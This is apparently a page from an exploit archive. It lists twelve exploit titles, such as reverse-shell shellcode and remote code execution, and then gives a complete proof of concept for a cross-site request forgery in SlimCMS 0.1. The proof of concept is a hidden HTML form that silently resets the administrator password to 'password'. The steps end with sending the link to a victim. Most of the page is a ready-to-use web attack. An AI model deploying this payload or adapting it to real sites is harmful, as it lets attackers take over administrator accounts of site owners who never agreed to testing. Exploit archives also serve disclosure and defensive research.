2815f48e25
12 new exploits
Linux x86_64 - Reverse Shell Shellcode
Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal
Solarwinds Virtualization Manager - Privilege Escalation
Blat 3.2.14 - Stack Overflow
Linux/x86 - Bindshell with Configurable Port - 87 bytes
Linux x86_64 Shellcode Null-Free Reverse TCP Shell
Linux x86 TCP Bind Shell Port 4444 (656 bytes)
Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution
Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode
ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass
Roxy Fileman 1.4.4 - Arbitrary File Upload
SlimCMS 0.1 - CSRF (Change Admin Password)
47 lines
1.8 KiB
HTML
Executable file
47 lines
1.8 KiB
HTML
Executable file
<!--
|
|
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
|
|
# CMS Link: https://github.com/revuls/SlimCMS/releases
|
|
# Date: 16th June'2016
|
|
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
|
|
# Vendor Homepage: http://www.slimcms.nl/
|
|
# Software Link: https://github.com/revuls/SlimCMS/releases
|
|
# Version: Slim CMSv0.1
|
|
# Tested on: Windows 10, XAMPP
|
|
# Twitter: https://twitter.com/m_avinash143
|
|
|
|
|
|
CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
|
|
|
|
|
|
Vulnerability Description :
|
|
It is possible to change the password of the administrator and complete account can be take over using this.
|
|
|
|
Steps to Reproduce the same
|
|
|
|
1. Login into the account.
|
|
2. Navigate to http://localhost/SlimCMS/admin/config
|
|
3. Fill the details and intecept the request using BurpSuite
|
|
|
|
Request Intercepted
|
|
-------------------
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/SlimCMS/api/config" method="POST">
|
|
<input type="hidden" name="title" value="{{7*7}}" />
|
|
<input type="hidden" name="description" value="{{7*7}}" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="hidden" name="password" value="password" />
|
|
<input type="hidden" name="theme" value="default" />
|
|
<input type="hidden" name="url" value="http://localhost/SlimCMS" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).
|
|
-->
|
|
|
|
|